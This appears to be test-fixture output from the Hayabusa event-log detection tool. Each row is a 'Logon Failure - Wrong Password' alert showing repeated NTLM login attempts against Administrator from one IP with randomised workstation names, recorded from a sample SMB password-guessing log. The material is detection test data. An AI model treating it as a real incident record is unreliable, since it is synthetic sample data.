+2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7rkiDUBuTCU2jDXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jjsCFTQoobrkQoWF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dNXav95nZyBhVOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yeq1x56Ct6R2Nu3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pUwyCNtwydEQu2bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bX7eihAOk3PUgbwM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPXqAsaYaXEr8I9L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4SaEmIpmlH1VMDun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3Dvp43a2h7Mzx2H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g3voKlRXc7rIaIYs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GF1Q5OhCLRAi96mN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: caHe4iY2CQoiumQI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJi6UAm6Pp6eax8Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EW0t2wapD8yniO4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PnaITXTihpB0stwx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tdBVoa82WKEAW2ce  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BelKzJrEjGIcU2dN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ujeb7fRHPGCGmFm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Czwt7KF2sQHemwdJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LQQ4nNpbfKKVCJZH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6jwIc6e0AHAhXKK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nld9Job0Ll1Fgtmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q9sS6i9iU3PXhokz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heaYv6Np8swhoVc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7rzgNBtUJkS93pO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gh45suNQ09FzPBjd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BOnwAGxxz994k6Ee  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L26mvUKOgGptcKaZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aqldRjcLl8KFZr5h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ycNPBtmRHShPOcRA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ISlMGsVvXry0rbju  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MjGjh70EQ5YVGJUt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yaYM5N2kuvuRCHRU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 32wgj2t7BLBviVxd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vr1kMRxLEaCIWIbf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4PHEJyKgp5wXRtBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbaoz8rTZVXUjRAg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d4eD3JQ5gquIqgND  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U9slFFSSXhFxPqG1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YDb5Up4KwJj0hN5n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DxqIpDLlnf6Xyc34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rTCTTYmKTIzzJwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oD3dLxlB3qWIhZEQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fe9xMOoCxPJIIyVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DW3YgBZYiGTeEw66  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VAKeeIcOeiQ3H9NF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nmF3ot3gJCsBlSwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDjoResfZvvVqqE5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V4dwzMwvVtzztGwr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qklApBFOMxVzucD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0IJSphtLB3eNARBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PLOFe4w5KpJ2UaGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3JTWkGadY1fJE2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kyTH0jxSZB2YVdhW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NRq5XrcDkFvabCzh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlYwlgrsMy1kSgEC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AchwW4ifbZ41AQNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PaxF7Q8ue1Kex1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WAhW2PErXdwNVrx5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoAV3ESqieev2JMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wFlWFijaFirgsAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSDjuqvzKLaWCWVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SL0CVu787iFRLiPU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZQDORN33izpv4tGO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v470yorD43fgGyjC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBbLWVZFDqFxb7dW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJsowt9MrhXciLOZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uhCVFyMmDI5shASV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yd4SM9EGM7cnO6Z5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PSR1tbtzdDaJDbXs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rNqyjBuN0Pq6WRO1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vqpMAmE9OvHbFCh2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
